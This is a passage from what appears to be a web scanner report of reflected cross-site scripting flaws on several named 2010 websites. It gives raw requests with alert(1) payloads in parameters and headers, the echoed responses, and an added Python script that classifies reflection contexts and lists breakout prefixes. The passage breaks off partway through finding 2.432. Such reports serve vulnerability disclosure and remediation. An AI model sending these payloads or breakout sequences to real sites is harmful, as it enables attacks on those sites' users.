Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4aaa7%3balert(1)//63b47141f3f was submitted in the autofollowed parameter. This input was echoed as 4aaa7;alert(1)//63b47141f3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a00d8341c51c053ef00d83451b2b369e2&asset_id=&atype=index&to=http%3A%2F%2Fadweek.blogs.com%2Fadfreak%2F&autofollowed=04aaa7%3balert(1)//63b47141f3f HTTP/1.1
Host: www.typepad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 16 Dec 2010 13:15:58 GMT
Server: Apache
X-Webserver: oak-tp-app005
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language
Content-Language: en
Content-Length: 14867
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 04aaa7;alert(1)//63b47141f3f,
blog_user_xid: '6p00d8341c51c053ef',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

2.423. http://www14.software.ibm.com/webapp/download/byproduct.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www14.software.ibm.com
Path:   /webapp/download/byproduct.jsp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b8a1d<script>alert(1)</script>cb83c424205 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/download/byproduct.jspb8a1d<script>alert(1)</script>cb83c424205 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:02:19 GMT
Server: IBM_HTTP_Server
$WSEP:
Surrogate-Control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 9570
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000HT7uHsDgcaOg2VvRG_MmycI:-1; Path=/


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...
</strong> /byproduct.jspb8a1d<script>alert(1)</script>cb83c424205 </p>
...[SNIP]...

2.424. http://www.adotas.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document without encoding. The payload b1b9c<script>alert(1)</script>229fe47e250 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response.

Caveat on the reflection point: as the response below shows, the header is written into a CSS comment (/* ... */) inside a <style> element. An HTML parser treats <style> content as raw text, so the <script> tag in this payload is not tokenised as markup and does not execute as shown; a payload would first have to terminate the comment and the style element. The scan therefore confirms unfiltered reflection, not script execution, and the finding should be re-tested with that in mind.

This proof-of-concept attack demonstrates that the application echoes attacker-controlled header data into its response without encoding.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user: browsers do not let page script set the User-Agent header, and the older Flash-based techniques for sending arbitrary headers from a victim's browser have since been closed. The flaw is therefore mainly reachable by a client attacking itself or by a non-browser client. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10b1b9c<script>alert(1)</script>229fe47e250
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Thu, 16 Dec 2010 15:17:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 77866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
order: 1px solid #ff0000;
}
a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10b1b9c<script>alert(1)</script>229fe47e250*/
.wp-polls-loading {
   display:none;
}
</style>
...[SNIP]...
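
The context named in each "Issue detail" above ("plain text between tags", "HTML comment", "JavaScript string") is the scanner's reading of the syntax around the echo, and 2.424 shows why it needs checking by hand: the echoed User-Agent sits inside a CSS comment within a <style> element. The following script is an added example, not code from this report or from any of the sites in it. It looks only at the bytes preceding a reflected canary and names the context the way a reviewer would (raw-text element, HTML comment, quoted attribute, JS string literal, or text between tags), together with the closing sequence a payload would need in front of a <script> tag. The response fragments and the canary are constructed, modelled on the snippets in 2.421, 2.423, 2.424, 2.427 and 2.431; the function and constant names are the example's own.

```python
import re

# Elements whose content an HTML parser treats as raw text: nothing inside them
# is tokenised as markup until the matching end tag appears.
RAW_TEXT_ELEMENTS = ("script", "style", "textarea", "title")

# What a payload must emit before a <script> tag would be parsed, per context.
# "text_between_tags" needs nothing, which is why 2.423 is a straightforward
# High, while the <style> reflection in 2.424 is not a confirmed execution.
BREAKOUT_PREFIX = {
    "text_between_tags": "",
    "attribute_dq": '">',
    "attribute_sq": "'>",
    "html_comment": "-->",
    "raw_text:style:css_comment": "*/</style>",
    "raw_text:style": "</style>",
    "raw_text:script:js_string_sq": "';</script>",
    "raw_text:script:js_string_dq": '";</script>',
    "raw_text:script": "</script>",
}

# Constructed canary; the scanner's payloads above have the same shape.
CANARY = "zz9<script>alert(1)</script>9zz"

# Constructed response fragments, each modelled on one finding in this section.
_TEMPLATES = {
    "style (2.424)":   "<html><head><style>\na.x{top:-3px;}/*Mozilla/5.0 CANARY*/\n</style></head></html>",
    "comment (2.427)": "<html><body><!--HTTP_REFERER: http://www.google.com/search?q=CANARY--></body></html>",
    "attr (2.421)":    '<form><input type="hidden" name="url" value="http://cnn.com/CANARY" /></form>',
    "js (2.431)":      "<script>\nvar p = {\n  outerref: 'http://www.google.com/?q=CANARY',\n};\n</script>",
    "text (2.423)":    "<p><strong>Page not found</strong> /byproduct.jspCANARY </p>",
}
SAMPLES = {k: v.replace("CANARY", CANARY) for k, v in _TEMPLATES.items()}


def _open_raw_text_element(prefix):
    """(name, content_start) if the reflection sits inside an unclosed raw-text
    element, else None. Case-insensitive, as the HTML tokenizer is."""
    for name in RAW_TEXT_ELEMENTS:
        opens = [m.end() for m in re.finditer(r"<%s\b[^>]*>" % name, prefix, re.I)]
        closes = [m.end() for m in re.finditer(r"</%s\s*>" % name, prefix, re.I)]
        if opens and (not closes or closes[-1] < opens[-1]):
            return name, opens[-1]
    return None


def classify_reflection(body, canary):
    """Name the syntactic context of the first occurrence of canary in body.
    Only the bytes before the canary are inspected, so the payload's own tags
    do not influence the verdict."""
    idx = body.find(canary)
    if idx < 0:
        return "not_reflected"
    prefix = body[:idx]

    raw = _open_raw_text_element(prefix)
    if raw:
        name, start = raw
        content = prefix[start:]
        if name == "style" and content.rfind("/*") > content.rfind("*/"):
            return "raw_text:style:css_comment"
        if name == "script":
            # Quote parity is a heuristic; a real tokenizer would also track
            # backslash escapes, regex literals and JS comments.
            if content.count("'") % 2:
                return "raw_text:script:js_string_sq"
            if content.count('"') % 2:
                return "raw_text:script:js_string_dq"
        return "raw_text:" + name

    if prefix.rfind("<!--") > prefix.rfind("-->"):
        return "html_comment"

    lt, gt = prefix.rfind("<"), prefix.rfind(">")
    if lt > gt:  # inside a start tag
        tag = prefix[lt:]
        if tag.count('"') % 2:
            return "attribute_dq"
        if tag.count("'") % 2:
            return "attribute_sq"
        return "tag_unquoted"
    return "text_between_tags"


def triage(body, canary):
    """Context plus the breakout a working payload would need in front of it."""
    ctx = classify_reflection(body, canary)
    return ctx, BREAKOUT_PREFIX.get(ctx)


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        ctx, pre = triage(body, CANARY)
        print("%-16s %-30s needs prefix %r" % (label, ctx, pre))
```

Run against a real response, pass the body and the exact string you sent; the verdict for 2.424 is raw_text:style:css_comment with prefix */</style>, which is the check the scanner's "plain text between tags" label skipped.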

2.425. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /2010/12/doubleverify-to-deliver-forward-is-with-verification/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document without encoding. The payload af389<script>alert(1)</script>ba953b11062 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response.

Caveat: as in 2.424, the reflection point (see the response below) is a CSS comment inside a <style> element, whose content the HTML parser treats as raw text. The <script> tag in this payload is therefore not parsed as markup; a payload would have to close the comment and the style element first. The scan confirms unfiltered reflection of the header, not script execution.

This proof-of-concept attack demonstrates that the application echoes attacker-controlled header data into its response without encoding.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2010/12/doubleverify-to-deliver-forward-is-with-verification/ HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10af389<script>alert(1)</script>ba953b11062
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmb=47048311; __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:22:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Thu, 16 Dec 2010 15:22:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 71728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
order: 1px solid #ff0000;
}
a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10af389<script>alert(1)</script>ba953b11062*/
.wp-polls-loading {
   display:none;
}
</style>
...[SNIP]...

2.426. http://www.adotas.com/about/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adotas.com
Path:   /about/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document without encoding. The payload cbba9<script>alert(1)</script>0ce811d4761 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response.

Caveat: as in 2.424 and 2.425, the reflection point (see the response below) is a CSS comment inside a <style> element, whose content the HTML parser treats as raw text. The <script> tag in this payload is therefore not parsed as markup; a payload would have to close the comment and the style element first. The scan confirms unfiltered reflection of the header, not script execution.

This proof-of-concept attack demonstrates that the application echoes attacker-controlled header data into its response without encoding.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: www.adotas.com
Proxy-Connection: keep-alive
Referer: http://research.adotas.com/?option=com_categoryreport&task=viewabstract&pathway=no&autodn=1&title=11093&crv=9679&src=12&tgt=127&cmp=2748&yld=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10cbba9<script>alert(1)</script>0ce811d4761
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=47048311; __utma=47048311.1018667347.1292504930.1292504930.1292504930.1

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:22:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.adotas.com/wp/xmlrpc.php
Cache-Control: max-age=7200
Expires: Thu, 16 Dec 2010 15:22:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 62279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="refresh
...[SNIP]...
order: 1px solid #ff0000;
}
a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10cbba9<script>alert(1)</script>0ce811d4761*/
.wp-polls-loading {
   display:none;
}
</style>
...[SNIP]...

2.427. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d3b00--><script>alert(1)</script>78152596edd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the --> in the payload closes the comment, and the <script> tag that follows is parsed as ordinary markup.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Unlike most headers, however, the Referer is filled in by the browser from the URL of the page the victim navigates from, so an attacker who controls that URL (for example its query string) controls the Referer the victim's browser sends, subject to the browser's referrer policy. Client-side technologies such as Flash have in the past also allowed arbitrary headers to be set. The header-only reflection partially mitigates the impact of the vulnerability, but the Low rating should be read with the Referer path in mind; the same applies to the other Referer findings in this section.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us HTTP/1.1
Host: www.infoprint.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d3b00--><script>alert(1)</script>78152596edd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 14:05:57 GMT
Last-Modified: Thu, 16 Dec 2010 14:05:55 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33597
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">
<!--
var currentURL = location.href;
if (currentURL
...[SNIP]...
<!--HTTP_REFERER: http://www.google.com/search?hl=en&q=d3b00--><script>alert(1)</script>78152596edd-->
...[SNIP]...

2.428. http://www.infoprint.com/precisionmarketing [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infoprint.com
Path:   /precisionmarketing

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 833fc--><script>alert(1)</script>9a461e7a837 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /precisionmarketing HTTP/1.1
Host: www.infoprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=833fc--><script>alert(1)</script>9a461e7a837

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:31:46 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:31:44 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33597
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">
<!--
var currentURL = location.href;
if (currentURL
...[SNIP]...
<!--HTTP_REFERER: http://www.google.com/search?hl=en&q=833fc--><script>alert(1)</script>9a461e7a837-->
...[SNIP]...

2.429. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.itworldcanada.com
Path:   /news/career-advice-running-projects-across-time-zones/142135

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload b716f<script>alert(1)</script>efabde2fa8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news/career-advice-running-projects-across-time-zones/142135 HTTP/1.1
Host: www.itworldcanada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b716f<script>alert(1)</script>efabde2fa8e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.30929.2835
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Thu, 16 Dec 2010 08:34:00 GMT; domain=.itworldcanada.com; expires=Fri, 16-Dec-2011 13:34:00 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: ASP.NET_SessionId=upt5hrmi3dosyg55c0adlpri; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ITWGuid=; expires=Wed, 15-Dec-2010 13:34:00 GMT; path=/
Set-Cookie: ITWGuid=f0d26395-568f-423c-a9ef-43c09e2e0935; expires=Fri, 16-Dec-2011 13:34:00 GMT; path=/
Set-Cookie: ITWVisited=; expires=Wed, 15-Dec-2010 13:34:00 GMT; path=/
Set-Cookie: ITWVisited=1; expires=Thu, 23-Dec-2010 13:34:00 GMT; path=/
X-Powered-By: ASP.NET
charset: text/html;charset=iso-8859-1
Date: Thu, 16 Dec 2010 13:34:00 GMT
Connection: close
Content-Length: 88260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<strong>"b716f<script>alert(1)</script>efabde2fa8e"</strong>
...[SNIP]...

2.430. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.itworldcanada.com
Path:   /news/career-advice-running-projects-across-time-zones/142135

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 376ff"><script>alert(1)</script>f76fe3c76af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink (see the response below) is an onclick handler of the form location.href='...', so the value sits inside a single-quoted JavaScript string inside a double-quoted HTML attribute. The PoC closes the attribute with ", but a lone ' would equally break out of the string literal, so both characters must be encoded for this sink.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news/career-advice-running-projects-across-time-zones/142135 HTTP/1.1
Host: www.itworldcanada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=376ff"><script>alert(1)</script>f76fe3c76af

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.30929.2835
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Thu, 16 Dec 2010 08:34:00 GMT; domain=.itworldcanada.com; expires=Fri, 16-Dec-2011 13:34:00 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: ASP.NET_SessionId=1hijqkud04byozmcxirph1nz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ITWGuid=; expires=Wed, 15-Dec-2010 13:34:00 GMT; path=/
Set-Cookie: ITWGuid=479d6254-ecdc-464d-9994-35166c64afba; expires=Fri, 16-Dec-2011 13:34:00 GMT; path=/
Set-Cookie: ITWVisited=; expires=Wed, 15-Dec-2010 13:34:00 GMT; path=/
Set-Cookie: ITWVisited=1; expires=Thu, 23-Dec-2010 13:34:00 GMT; path=/
X-Powered-By: ASP.NET
charset: text/html;charset=iso-8859-1
Date: Thu, 16 Dec 2010 13:34:00 GMT
Connection: close
Content-Length: 88007


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div id="sh_navbar" class="sh_navbar" onclick="location.href='http://www.itworldcanada.com/result.aspx?keywords=376ff"><script>alert(1)</script>f76fe3c76af'">
...[SNIP]...

2.431. http://www.linuxworld.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linuxworld.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e35db'-alert(1)-'8d2e281dc39 was submitted in the Referer HTTP header. The payload portion was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the application does apply HTML entity encoding to the value (the & in the Referer appears as &amp; at the reflection point below), but that encoding is irrelevant inside a script block: the single quote passes through untouched, terminates the string literal, and the -alert(1)- that follows is evaluated as JavaScript. Encoding for the wrong context provides no protection.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. The Referer is, however, derived from the URL of the page the victim navigates from, so an attacker who controls that URL can influence what is sent, subject to the browser's referrer policy. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.linuxworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e35db'-alert(1)-'8d2e281dc39

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:36:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=174.121.222.18.1292506578136419; path=/; expires=Sat, 15-Dec-12 13:36:18 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 214703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
eneral',
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&amp;q=e35db'-alert(1)-'8d2e281dc39',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};

...[SNIP]...

2.432. http://www.networkworld.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd17a'-alert(1)-'7a4e41c4cba was submitted in the Referer HTTP header. The payload portion was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 2.431, the & in the Referer is entity-encoded to &amp; at the reflection point below while the single quote passes through, so the HTML encoding the application applies offers no protection in this script context.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bd17a'-alert(1)-'7a4e41c4cba

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Thu, 16 Dec 2010 13:36:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Dec 2010 13:36:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292506614444997; path=/; expires=Sat, 15-Dec-12 13:36:54 GMT
Content-Length: 214703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
eneral',
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
